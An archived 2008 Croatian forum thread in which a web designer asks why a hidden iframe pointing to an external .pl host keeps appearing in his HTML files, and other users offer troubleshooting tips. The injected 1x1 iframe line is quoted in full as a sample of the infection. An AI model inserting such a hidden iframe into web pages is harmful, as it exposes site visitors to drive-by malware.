PDA

View Full Version : Imam neki čudan kôd na stranici. Je li to virus?

buduci_designer
30-09-2008, 12:56
Imam problem koji ne znam kako riješiti pa molim za pomoć. Naime, kod izrade html stranica, ali i kod svih starih stranica koje su na kompu ubacuje se kod u body tag sljedećeg sadržaja: :zbunj:<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>Svakim novim otvaranjem stranice ili otvaranjem novog praznog lista u dw pojavi se nekoliko linija gore navedenog koda. Pretpostavljam da je riječ o nekom virusu ili šta već, ali ni sa čišćenjem sa antivurusnim programima ni adaware ni preinstaliravanjem dw nisam uspio ukloniti taj kod. Bez obzira što ga ja obrišem i spremim dokument bez koda, on se opet pojavi kod novog otvaranja tog dokumenta. :zbunj::hmmmmmm:

Zna li netko što je to i kako da riješim problem jer me ovo već prilično izluđuje i malo fali da uzmem malo oveći čekić i pokažem mu ja ko je jači :razbi:

tom971
01-10-2008, 17:00
spremi bez koda i otvori sa editorom(notepad++) jer se i onda pojavljuje?

buduci_designer
01-10-2008, 20:36
bez obzira koji editor koristim, taj kod se uvijek pojavljuje u nekoliko linija na kraju body taga, pa iz toga zaključujem da je riječ o nekom čudnom virusu. :eek:

da je nešto stvarno divlje dokazuje i to da ako bi sad ovu stranicu spremio na disk kao html file onda bi se na toj stranici otvorenoj u nekom editoru. pojavio taj kod. možda su neke više sile umiješane pa ću morat pozvat istjerivače duhova :neznam::misa:

tom971
01-10-2008, 21:27
onda ljepo u windows search upisi iraq.jpg i vidi od kud se to generira.
Prije toga pobrisi naravno sve strane, di znas da to postoji
i je virus upisi u google

ZokiHR
02-10-2008, 00:20
evo, odakle

http://www.imagesforme.com/out.php/i172431_screenshot1.jpg

tom971
02-10-2008, 01:04
od tud ga je mozda dobio, ali sad nesto od nekuda i dalje generira taj iframe, to mora naci

Ivan Peso
05-10-2008, 01:07
Koristiš mozillu 3? baš tako...

Mozilla 3 ima svoju bazu podataka na interetu u kojoj su sve stranice koje mogu naštetiti vašem računalu tako da je tvoja stranica ušla u tu bazu... Mislim da ti cilj nije zaobić tu reklamu nego ti je cilj izbacit stranicu iz "crne liste"